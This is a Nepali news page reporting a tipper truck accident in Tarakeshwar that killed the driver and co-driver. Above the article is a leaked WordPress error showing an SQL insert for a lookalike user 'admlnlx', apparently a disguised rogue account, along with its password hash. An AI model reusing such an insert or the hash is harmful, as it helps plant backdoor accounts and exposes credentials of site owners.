WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bpj3SdqTatP863Mxk4Re6sbgR8Pd5Z.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 04:50:21', '', 'admlnlx', 'admlnlx')

ट्रिपर दुर्घटना हुँदा तारकेश्वरमा २ जनाको घटनास्थलमै मृत्यु – Gaule Khabar

ट्रिपर दुर्घटना हुँदा तारकेश्वरमा २ जनाको घटनास्थलमै मृत्यु

ट्रिपर दुर्घटना हुँदा तारकेश्वरमा २ जनाको घटनास्थलमै मृत्यु

गाउँले न्युज, तारकेश्वर नगरपालिकास्थित जितपुरको कोट गाउँमा ट्रिपर दुर्घटना हुँदा दुई जनाको मृत्यु भएको छ ।
घटना दुवैजनाको मृत्‍यु भएको हो । मृत्यु हुनेहरुमा चालक माइला तामाङ्ग र सह चालक कमल तामाङ्ग रहेका छन् ।

शुक्रबार काठमाडौंबाट फोहोर बोकेर नुवाकोटको सिसडोल जाँदै गरेको ना २ क ३३८ नम्बरको ट्रिपर दुर्घटना भएको प्रहरीले जनाएको छ ।

ट्रिपरले ‘क्लिन नेपाल’ नामक कम्पनीको फोहोर ढुवानी गर्दै आएको थियो । महानगरीय प्रहरी वृत बालाजुका प्रमुख रन्जित सिंह राठौरले ट्रिपर तीव्र गतिमा रहेको र सडकबाट ५० मिटर तल आलुबारीमा खसेको जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका